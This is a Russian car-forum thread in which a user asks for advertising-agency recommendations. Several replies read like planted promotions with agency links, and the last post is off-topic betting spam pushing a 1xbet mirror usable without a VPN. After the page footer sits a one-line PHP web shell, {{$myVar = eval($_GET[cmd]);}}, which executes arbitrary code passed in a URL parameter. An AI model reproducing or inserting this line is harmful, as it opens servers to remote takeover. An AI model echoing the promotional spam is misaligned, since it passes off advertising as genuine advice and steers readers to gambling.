+ Ответить в теме
Показано с 1 по 8 из 8

Тема: Рекламное агенство


  1. #1
    Мимо проходил Кевин is on a distinguished road Аватар для Кевин
    Регистрация
    17.01.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    25

    Рекламное агенство

    Доброго времени суток! Подскажите хорошее рекламное агентство?
    Последний раз редактировалось Кевин; 19.03.2020 в 07:04.

  2. #2
    Мимо проходил Григорий77 is on a distinguished road Аватар для Григорий77
    Регистрация
    24.12.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    83
    Я думаю что стоить искать через поисковик, таких компаний сейчас очень много, нужно найти проверенную, и не компанию однодневку. А с отзывами по внимательнее, их запросто можно подделать.

  3. #3
    Мимо проходил Vika889 is on a distinguished road Аватар для Vika889
    Регистрация
    07.08.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    11
    Добрый день! Сейчас скину ребят которые мне настроили рекламу и сео. Рекламное агентство https://lightstar.pro/. Выполнели работы грамотно и быстро. По ведению и продвижению по СЕО работаем с ними до сих пор. Мне нравятся, что они работают сами на себя их 3 человек, каждый может друг друга заменить, в 3 головы работают. Это их фишка. + цены не такие высокие как у реальных и крупных рекламных агенств.

  4. #4
    Мимо проходил lapa19 is on a distinguished road Аватар для lapa19
    Регистрация
    31.01.2021
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    4
    Могу поделиться с вами своим опытом сотрудничества с рекламным агентством Factor Media https://factormedia.ru/ . Понадобилась мне наружная реклама, когда я открыла свой небольшой магазин на окраине города, где достаточно неплохая проходимость людей, так как люди идут с остановки в жилой массив и по дороге встречаются глазами с моим магазином. Понимаю, что обычной вывеской уже никого не удивишь, я решила найти более современное решение. Мне компания понравилась выполнением сроков размещения и качественной установкой рекламы. После того как реклама была размещена на витрине магазина, я буквально в первый день стала замечать прирост клиентов в магазине, потому что яркая, оригинальная и довольно-таки необычная реклама положительно воздействовала на прохожих, у которых возникал интерес, что внутри моего магазина, если на витрине висит такая запоминающая реклама. Вот такой эффект продолжается и сейчас, и в магазине моем достаточно клиентов.

  5. #5
    Мимо проходил Кипер is on a distinguished road Аватар для Кипер
    Регистрация
    24.10.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    78
    Приветик! Я тоже решил вставить и свои пять копеек, так сказать. Недавно мне доводилось обращаться в Нико-Медиа, это рекламное агенство, которое работает в Краснодарском крае. Так что хочу сказать - спецы отличные. Ресурсы у них серьезные, связи есть везде. Мы на радио заказали рекламу, бегущую строку и в интернете тоже. Боялись, что сильно дорого будет, но зря. Окупилось очень быстро все, реклама работает!

  6. #6
    GTI-Racing Felhaghma is on a distinguished road Аватар для Felhaghma
    Регистрация
    23.10.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    482
    а мы думаем разместить рекламу в лифтах, кто пробовал пользоваться такими услугами, насколько это эффективно?

  7. #7
    GTI-Racing Maxxxx is on a distinguished road Аватар для Maxxxx
    Регистрация
    08.10.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    383
    Цитата Сообщение от Felhaghma Посмотреть сообщение
    а мы думаем разместить рекламу в лифтах, кто пробовал пользоваться такими услугами, насколько это эффективно?

    Я заказывал размещение рекламы в лифтах на видеомониторах у компании Ингруп https://xn--c1ajpjes.xn--p1ai/ и остался доволен результатом. Эффективность рекламы была заметна уже после первого месяца, а общение с менеджерами было очень удобным и оперативным. Я рекомендую Ингруп для размещения рекламы в лифтах и буду продолжать сотрудничать с ними в будущем.

  8. #8
    GTI-Racing Nikolas75 is on a distinguished road Аватар для Nikolas75
    Регистрация
    26.11.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    978
    Я так думаю, что большинство играет именно из за адреналина, а не из за самого выигрыша)) Хотя конечно выигрыш это вдвойне приятно, знаю так как сам иногда ставлю. Не давно нашёл список азиатских БК, зарегистрировался Https://1xbetzercalo.ru/ , у них более интересные предложения по бонусам. Плюс в том, что можно играть из любой страны без впн.

+ Ответить в теме

Похожие темы

  1. Рекламное агентство
    от Трейдер в разделе Недвижимость
    Ответов: 4
    Последнее сообщение: 27.02.2020, 08:33

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}